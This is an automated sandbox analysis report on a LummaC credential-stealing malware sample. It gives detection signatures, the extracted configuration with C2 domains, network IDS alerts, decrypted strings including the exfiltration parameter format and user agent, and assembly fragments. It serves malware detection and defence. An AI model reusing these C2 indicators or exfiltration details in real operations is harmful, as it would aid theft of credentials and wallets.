Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MPgkx6bQIQ.exe

Overview

General Information

Sample name:MPgkx6bQIQ.exe
renamed because original name is a hash value
Original sample name:1663e17268ae9d60dd70ae27b8ea43ab.exe
Analysis ID:1581627
MD5:1663e17268ae9d60dd70ae27b8ea43ab
SHA1:95a8475a8682188c8a99d66b35a0157cb8788219
SHA256:fbc834cf913a08c6e1cba50ca8dc2b072a4e252f12448a7f5e95d3a0b1de6b7a
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MPgkx6bQIQ.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\MPgkx6bQIQ.exe" MD5: 1663E17268AE9D60DD70AE27B8EA43AB)
    • WerFault.exe (PID: 8024 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["scentniej.buzz", "inherineau.buzz", "rebuildeso.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1514080921.0000000003047000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              Click to see the 6 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.3.MPgkx6bQIQ.exe.24d0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.2.MPgkx6bQIQ.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  0.2.MPgkx6bQIQ.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    0.3.MPgkx6bQIQ.exe.24d0000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:18.031260+010020283713Unknown Traffic192.168.2.84970623.55.153.106443TCP
                      2024-12-28T10:05:20.443634+010020283713Unknown Traffic192.168.2.849707172.67.157.254443TCP
                      2024-12-28T10:05:22.525521+010020283713Unknown Traffic192.168.2.849708172.67.157.254443TCP
                      2024-12-28T10:05:25.031841+010020283713Unknown Traffic192.168.2.849709172.67.157.254443TCP
                      2024-12-28T10:05:27.299569+010020283713Unknown Traffic192.168.2.849710172.67.157.254443TCP
                      2024-12-28T10:05:29.962225+010020283713Unknown Traffic192.168.2.849711172.67.157.254443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:21.198377+010020546531A Network Trojan was detected192.168.2.849707172.67.157.254443TCP
                      2024-12-28T10:05:23.309324+010020546531A Network Trojan was detected192.168.2.849708172.67.157.254443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:21.198377+010020498361A Network Trojan was detected192.168.2.849707172.67.157.254443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:23.309324+010020498121A Network Trojan was detected192.168.2.849708172.67.157.254443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:16.144554+010020585721Domain Observed Used for C2 Detected192.168.2.8501021.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:15.286974+010020585761Domain Observed Used for C2 Detected192.168.2.8633571.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:16.294003+010020585781Domain Observed Used for C2 Detected192.168.2.8541581.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:15.857537+010020585801Domain Observed Used for C2 Detected192.168.2.8619931.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:15.432014+010020585841Domain Observed Used for C2 Detected192.168.2.8557111.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:15.573887+010020585861Domain Observed Used for C2 Detected192.168.2.8507751.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:15.715330+010020585881Domain Observed Used for C2 Detected192.168.2.8583801.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:16.000648+010020585901Domain Observed Used for C2 Detected192.168.2.8604871.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:25.937122+010020480941Malware Command and Control Activity Detected192.168.2.849709172.67.157.254443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-28T10:05:18.814081+010028586661Domain Observed Used for C2 Detected192.168.2.84970623.55.153.106443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.3.MPgkx6bQIQ.exe.24d0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "inherineau.buzz", "rebuildeso.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}
                      Multi AV Scanner detection for submitted file
                      Source: MPgkx6bQIQ.exeVirustotal: Detection: 41%Perma Link
                      Source: MPgkx6bQIQ.exeReversingLabs: Detection: 55%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                      Machine Learning detection for sample
                      Source: MPgkx6bQIQ.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00415298 CryptUnprotectData,0_2_00415298

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeUnpacked PE file: 0.2.MPgkx6bQIQ.exe.400000.0.unpack
                      Source: MPgkx6bQIQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0040C917
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_00415298
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00415298
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_0043CB20
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_0043CD60
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041BEA0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0040CFF3
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0040CFF3
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp al, 2Eh0_2_00426054
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp eax0_2_00426054
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05D
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05D
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B068
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B068
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0040E83B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0040A940
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edx, ecx0_2_0040A940
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp ecx0_2_0043C1F0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00425990
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ecx, di0_2_00425990
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B195
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_0043B9A1
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_004369A0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0041E9B0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_004299B0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_0042526A
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebx, edi0_2_0041D270
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov esi, eax0_2_00423A34
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_0043D2F0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_0043D2F0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp ecx0_2_0043C280
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0043AAB2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_004252BA
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_004252BA
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov eax, ebx0_2_0041CB05
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edx, eax0_2_00427326
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_004143C2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]0_2_004143C2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042A3D0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0042C45C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_00436C00
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4FC
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0042B4FC
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_00418578
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edx, eax0_2_0042750D
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_00421D10
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0040DD25
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, edx0_2_0040BDC9
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_00417582
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_00427DA2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_004205B0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C64A
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0042AE48
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp eax0_2_00426E50
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4F7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0042B4F7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0042AE24
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00433630
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C6E4
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00425E90
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_0043CE90
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004166A0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0042ADF4
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov eax, edx0_2_0041C6BB
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp eax0_2_0043BF40
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_00415F66
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_0043A777
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_00409700
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_00409700
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_00409700
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C726
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C735
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0041DF80
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0248D25A
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0248D25A
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp eax0_2_024BC268
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_024BB2CF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024BB2CF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_024BB2C4
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024BB2C4
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_024BB2C2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024BB2C2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024BB3FC
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp al, 2Eh0_2_024A63B6
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, edx0_2_0248C030
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp eax0_2_024A70E4
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_024BD0F7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_024A60F7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024AB08B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024AB0AF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024AB05B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0249E1E7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_024AA637
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024AC6C3
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_024AB763
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024AB763
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp eax0_2_024A6739
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_024987DF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_024977E9
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then jmp ecx0_2_024BC79B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edx, eax0_2_024A7797
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_024A54D1
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebx, edi0_2_0249D4D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_0249554C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_02496544
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_024BD557
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_024BD557
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0249C528
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_024A552B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_024A559D
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_024A55B3
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0248DA09
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0248DA09
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0248EAA2
